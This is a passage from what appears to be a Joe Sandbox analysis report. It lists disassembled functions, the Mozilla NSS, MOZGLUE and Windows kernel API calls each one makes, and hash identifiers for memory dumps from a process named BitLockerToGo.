                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9D14C5
                                                                                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9D14E2
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9D1546
                                                                                                                                                                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C9D15BA
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C9D16B4
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1909280232-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b453655d336c0e6273dde5a8e34b9b9947d016be6699914457e983db5a0c2b3e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ad03482edc66c17018c96cbe6ff5ad3403d3795f323386a1ffcfc6c53c69c345
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b453655d336c0e6273dde5a8e34b9b9947d016be6699914457e983db5a0c2b3e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49610F76A04B009FDB118F20C880BDEB7B4BF9A318F45851CED8A67711DB35E949CB92
                                                                                                                                                                                                                                                                                                                    Function 6CAFCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAFC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CAFDAE2,?), ref: 6CAFC6C2
                                                                                                                                                                                                                                                                                                                    • PR_Now.NSS3 ref: 6CAFCD35
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBA0A27), ref: 6CB59DC6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBA0A27), ref: 6CB59DD1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB59DED
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA91C6F,00000000,00000004,?,?), ref: 6CAE6C3F
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3 ref: 6CAFCD54
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59BF0: TlsGetValue.KERNEL32(?,?,?,6CBA0A75), ref: 6CB59C07
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA91CCC,00000000,00000000,?,?), ref: 6CAE729F
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAFCD9B
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CAFCE0B
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CAFCE2C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CAFCE40
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: TlsGetValue.KERNEL32 ref: 6CAF14E0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: EnterCriticalSection.KERNEL32 ref: 6CAF14F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: PR_Unlock.NSS3 ref: 6CAF150D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAFCEE0: PORT_ArenaMark_Util.NSS3(?,6CAFCD93,?), ref: 6CAFCEEE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAFCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CAFCD93,?), ref: 6CAFCEFC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAFCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CAFCD93,?), ref: 6CAFCF0B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAFCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CAFCD93,?), ref: 6CAFCF1D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAFCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CAFCD93,?), ref: 6CAFCF47
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAFCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CAFCD93,?), ref: 6CAFCF67
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAFCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CAFCD93,?,?,?,?,?,?,?,?,?,?,?,6CAFCD93,?), ref: 6CAFCF78
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3748922049-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 32d323609478027432aa4c6409691845090470e35f00c7dae3a30b2de07d85b4
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a19290365bbc077698e5478ba7fd01f4c6049c038c5644e3079695f78f25494f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32d323609478027432aa4c6409691845090470e35f00c7dae3a30b2de07d85b4
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F251B3B6E001049BE720DF6ADC40BEA77F4EF4834CF290524E96597741EB31E98ACB91
                                                                                                                                                                                                                                                                                                                    Function 6CACEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CACEF38
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAB9520: PK11_IsLoggedIn.NSS3(00000000,?,6CAE379E,?,00000001,?), ref: 6CAB9542
                                                                                                                                                                                                                                                                                                                    • PK11_Authenticate.NSS3(?,00000001,?), ref: 6CACEF53
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD4C20: TlsGetValue.KERNEL32 ref: 6CAD4C4C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD4C20: EnterCriticalSection.KERNEL32(?), ref: 6CAD4C60
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4CA1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CAD4CBE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4CD2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4D3A
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3 ref: 6CACEF9E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59BF0: TlsGetValue.KERNEL32(?,?,?,6CBA0A75), ref: 6CB59C07
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CACEFC3
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CACF016
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CACF022
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2459274275-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a7698cbb72851f78f6f859cdd229767a8a1a0c56a68406b9788e924248cb5bb6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d86a4ca23d0b86415deb699c74d1949b2a672692d6658cf1ece5c75ad0f546f0
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7698cbb72851f78f6f859cdd229767a8a1a0c56a68406b9788e924248cb5bb6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1841A471E00109AFDF018FA9DC85BEE7BB9AF48358F044029F914A7351E771D959CBA2
                                                                                                                                                                                                                                                                                                                    Function 6C9CDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9CDC60
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C9CD38A,?), ref: 6C9CDC6F
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,6C9CD38A,?), ref: 6C9CDCC1
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C9CD38A,?), ref: 6C9CDCE9
                                                                                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C9CD38A,?), ref: 6C9CDD05
                                                                                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C9CD38A,?), ref: 6C9CDD4A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1842996449-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 45a6940e3428aa192a66aa76f27f8da943297986cc86e6172bcd2464c528f7ed
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5828c1aac01d1c883a4e80d75941807ee0d80036e85b920a80877f186498fb59
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45a6940e3428aa192a66aa76f27f8da943297986cc86e6172bcd2464c528f7ed
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76417CB6B00605DFCB00CF99C88099AB7F5FF99314B654569D946ABB10EB31FC00CB92
                                                                                                                                                                                                                                                                                                                    Function 6CA90E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CERT_DecodeAVAValue.NSS3(?,?,6CA90A2C), ref: 6CA90E0F
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CA90A2C), ref: 6CA90E73
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CA90A2C), ref: 6CA90E85
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(00000001,?,?,6CA90A2C), ref: 6CA90E90
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CA90EC4
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CA90A2C), ref: 6CA90ED9
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3618544408-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: cc9eef7cdb0b02060d836630d5942ae68cbe63def91cee696269726e6a605028
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5104931a235d1564d0ea8bd74c3d49bf136462c3b9ae5ff79364bd9bdefed23a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc9eef7cdb0b02060d836630d5942ae68cbe63def91cee696269726e6a605028
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB213E76E102845BEF10496A9C47B6B76FFDBC9BC8F1D0035D81C97A02EB70C8D982A1
                                                                                                                                                                                                                                                                                                                    Function 6C9B6590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AFA80: GetCurrentThreadId.KERNEL32 ref: 6C9AFA8D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AFA80: AcquireSRWLockExclusive.KERNEL32(6C9FF448), ref: 6C9AFA99
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9B6727
                                                                                                                                                                                                                                                                                                                    • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C9B67C8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9C4290: memcpy.VCRUNTIME140(?,?,6C9D2003,6C9D0AD9,?,6C9D0AD9,00000000,?,6C9D0AD9,?,00000004,?,6C9D1A62,?,6C9D2003,?), ref: 6C9C42C4
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                                                                                                                    • String ID: data
                                                                                                                                                                                                                                                                                                                    • API String ID: 511789754-2918445923
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2bf46fdfa24bdda9fca44e2bb9014a32cfae15fc9f63f9af0277ac2e30165044
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0a13bceb250fbb998e1922318617f46299a048e9b9a27c081969f8bd87fdf0e3
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bf46fdfa24bdda9fca44e2bb9014a32cfae15fc9f63f9af0277ac2e30165044
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27D1DEB5A093409FD724CF24C841B9FB7E5AFE5308F10892DE58997B91EB31E909CB52
                                                                                                                                                                                                                                                                                                                    Function 6C9AD5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C97EB57,?,?,?,?,?,?,?,?,?), ref: 6C9AD652
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C97EB57,?), ref: 6C9AD660
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C97EB57,?), ref: 6C9AD673
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C9AD888
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                                    • String ID: |Enabled
                                                                                                                                                                                                                                                                                                                    • API String ID: 4142949111-2633303760
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 06f2327a37bd10180e4bb385d6ced351c10e127108ba73b492aa04ca0017b1c1
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9c89463097581eee83b5b3d2bf421bb502765892954c9ec7abbe06aa93e5d1db
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06f2327a37bd10180e4bb385d6ced351c10e127108ba73b492aa04ca0017b1c1
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4A102B1A053088FDB14CFA8C4907AEBBF5AF59318F18805CDC99AB741D735E946CBA1
                                                                                                                                                                                                                                                                                                                    Function 6CA7AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA7AFDA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • misuse, xrefs: 6CA7AFCE
                                                                                                                                                                                                                                                                                                                    • %s at line %d of [%.10s], xrefs: 6CA7AFD3
                                                                                                                                                                                                                                                                                                                    • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA7AFC4
                                                                                                                                                                                                                                                                                                                    • unable to delete/modify collation sequence due to active statements, xrefs: 6CA7AF5C
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                                                                                                                                                    • API String ID: 632333372-924978290
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 51977f54b4843a4852d597e0d283da20989f5b1cba62cb2f524840cc954032a9
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9bc6a2ac496cf69b2238c80ecf327973d97031e8ce6b51278b9f076225aef3f9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51977f54b4843a4852d597e0d283da20989f5b1cba62cb2f524840cc954032a9
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B691D1B9B002159FDB14CF69C854AAEB7F2BF45314F1985A8E865ABB91C334EC41CB70
                                                                                                                                                                                                                                                                                                                    Function 6C9AF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C9AF480
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97F100: LoadLibraryW.KERNEL32(shell32,?,6C9ED020), ref: 6C97F122
